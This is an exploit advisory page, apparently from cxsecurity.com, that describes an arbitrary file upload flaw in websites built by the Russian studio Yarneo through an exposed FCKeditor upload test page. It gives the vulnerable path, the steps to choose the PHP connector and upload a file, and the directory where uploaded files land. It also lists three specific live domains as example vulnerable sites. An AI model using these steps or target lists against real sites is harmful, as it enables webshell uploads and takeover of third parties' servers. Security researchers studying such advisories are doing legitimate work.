ЯрНео Разработка сайтов Yarneo WebDesign Unauthorized File Insertion

2019.05.21
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#################################################################### # Exploit Title : ЯрНео Разработка сайтов Yarneo WebDesign Unauthorized File Insertion # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 21/05/2019 # Vendor Homepage : yarneo.ru # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description About Software : ***************************** Yarneo is a Web Design and Development Company in Russia. #################################################################### # Impact : *********** Yarneo is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. #################################################################### # Arbitrary File Upload / Unauthorized File Insert Exploit : ************************************************** /fckeditor/editor/filemanager/connectors/uploadtest.html Select the "File Uploader" to use : Choose PHP and upload your file. Directory File Path : ********************** /pic/userfile/[YOURFILENAME].txt .jpg .gif .png #################################################################### # Example Vulnerable Sites : ************************ [+] xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html [+] xn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html [+] xn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top